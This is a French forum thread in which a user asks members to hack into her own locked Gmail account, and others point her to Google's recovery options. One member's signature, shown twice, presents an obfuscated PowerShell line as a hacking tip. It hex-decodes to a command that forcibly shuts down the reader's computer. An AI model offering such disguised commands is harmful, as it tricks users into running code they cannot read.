Annonce

Réduire
Aucune annonce.

Besoin d'aide pour récupérer mon compte Gmail

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Besoin d'aide pour récupérer mon compte Gmail

    Bonsoir,

    Je vous expose ici mon problème.
    J'ai oublié mon mot de passe Gmail mais même en cliquant sur "mot de passe oublié" je suis incapable de récupérer mon compte (je n'ai pas de question secrète, etc..). Je suis allée sur le forum Gmail mais ils ont été incapables de m'aider. Je suis un peu desespérée en fait.. C'est pourquoi je fais appel à votre aide pour que quelqu'un puisse me récupérer mon compte (hacker mon compte pour récupérer mon mot de passe), s'il vous plaît. Je peux vous prouver que ce compte m'appartient bien (avec ma carte d'identité) et que je ne suis pas une personne malintentionné. Et mon compte m'est vraiment important..

    Edit : J'ai tout essayé : demander de l'aide sur le forum Gmail, cliquer sur "mot de passe oublié", les options de récupération de compte mais en vain. De plus google ne dispose de rien pour les contacter.

    Merci par avance
    Dernière modification par Weiss, 03 juillet 2017, 23h15. Motif: Plus de précisions

  • #2
    Va sur cette page et suit les instructions.

    Commentaire


    • #3
      C'est ce que j'ai fais (comme dit précedemment) mais je ne peux pas récupérer mon compte avec cela. Je n'ai ni d'email de récupération, ni de téléphone associé au compte et ni de question secrète. Quant à la date de création du compte, je ne m'en souviens plus. Donc j'ai besoin d'aide

      Commentaire


      • #4
        Ca m'a souvent dépanné, en espérant que ça fonctionne aussi pour toi : http://bit.ly/1dvLSSR
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Si tu viens ici pour troller, évite de répondre s'il te plaît. Je recherche sérieusement de l'aide.

          Commentaire


          • #6
            Je recherche sérieusement de l'aide.
            Mais tu n'as pas l'air d'être une personne sérieuse pour autant. Si le lien qui t'a déjà été donné ne t'aide pas, je crains que les seules solutions qu'il te reste soient :
            - De te démerder avec un quelconque support gmail (si ça existe).
            - D'écouter un air de saxophone OKLM.

            En conclusion : je ne vois pas ce qui te permet de croire que qui que ce soit ici prendrait le moindre risque pour ta gueule en essayant de récupérer ton (sois-disant) compte gmail.

            Bye.



            Hack like a pro :
            PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

            Commentaire


            • #7
              //
              Dernière modification par Weiss, 04 juillet 2017, 13h51.

              Commentaire


              • #8
                Envoyé par Weiss Voir le message
                C'est ce que j'ai fais (comme dit précedemment) mais je ne peux pas récupérer mon compte avec cela. Je n'ai ni d'email de récupération, ni de téléphone associé au compte et ni de question secrète. Quant à la date de création du compte, je ne m'en souviens plus. Donc j'ai besoin d'aide
                Pas de bras, pas de chocolat... Faut pas se moquer du monde, il y a une solution toute simple ! Lorsque tu ne peux répondre à ses questions, il te reste la possibilité de donner une adresse mail où tu pourras récupérer un code de validation à insérer, puis il te donnera les informations nécessaires pour te connecter.
                Si tu n'as pas d'autre adresse mail, alors tu en crées une rapidement où tu veux... Cette solution est imparable, tout le monde peut le faire, y compris dans ta situation. Bonne fin de journée...

                Commentaire


                • #9
                  //
                  Dernière modification par Weiss, 04 juillet 2017, 13h52.

                  Commentaire


                  • #10
                    Hello ,

                    je n'ai pas vraiment de solution a te proposer a part celle que Fred t'a proposé , mais a tu jeté un oeil a cette page https://support.google.com/mail/trou.../2402620?hl=fr. Sinon tu peut tenter de poser la question sur le forum d'aide de gmail ? https://productforums.google.com/for...forum/gmail-fr. Ou alors tu peut essayer de les contacter par téléphone ou par courrier et explique leur ton problème .
                    Adresse : google 8 Rue de Londres, 75009 Paris, France
                    Téléphone : +33 1 42 68 53 00

                    Commentaire


                    • #11
                      Envoyé par blend Voir le message
                      Hello ,

                      je n'ai pas vraiment de solution a te proposer a part celle que Fred t'a proposé , mais a tu jeté un oeil a cette page https://support.google.com/mail/trou.../2402620?hl=fr. Sinon tu peut tenter de poser la question sur le forum d'aide de gmail ? https://productforums.google.com/for...forum/gmail-fr. Ou alors tu peut essayer de les contacter par téléphone ou par courrier et explique leur ton problème .
                      Adresse : google 8 Rue de Londres, 75009 Paris, France
                      Téléphone : +33 1 42 68 53 00
                      Bonsoir,

                      Oui bien sur, j'ai jeté un oeil à cette page. J'ai également demandé de l'aide sur le forum Gmail. Bref j'ai essayé tous les moyens possibles pour récupérer mon compte et je ne peux pas.
                      Il est impossible de contacter google par courrier ni par téléphone. Et si l'on cherche le numéro de google il y en a une 20 aine de différents.. rien de bien fiable..

                      J'ai donc besoin d'aide pour récupérer mon compte. C'est vraiment important pour mes études, s'il vous plaît !

                      Edit : Pardon je n'avais pas vu que tu avais posté un numéro et une adresse. J'ai lu plusieurs post disant qu'il est inutile de contacter Google par courriel ou téléphone pour les récupérations de compte. Et qu'il n'y répondrait pas..
                      Dernière modification par Weiss, 03 juillet 2017, 23h18.

                      Commentaire


                      • #12
                        Personne ? Peut-être ne suis-je pas bien claire dans mes propos ? :/

                        Commentaire


                        • #13
                          Si si tu es clair, il n'y a aucun moyen possible, désolé ! Ce n'est pas nous ou gmail qui y mettons de la mauvaise volonté aux vues des solutions proposées...

                          Commentaire


                          • #14
                            Personne ne peut me récupérer mon mot de passe ? Je ne mets pas de mauvaise volonté :/. Pourquoi tu penses ça ?

                            Commentaire


                            • #15
                              Ce que je veux dire, c'est malgré toutes les possibilités et il y en a un paquet, tu n'arrives pas à retrouver ton mot de passe, alors je ne vois pas comment aider plus pour trouver ton mot de passe.

                              Commentaire

                              Chargement...
                              X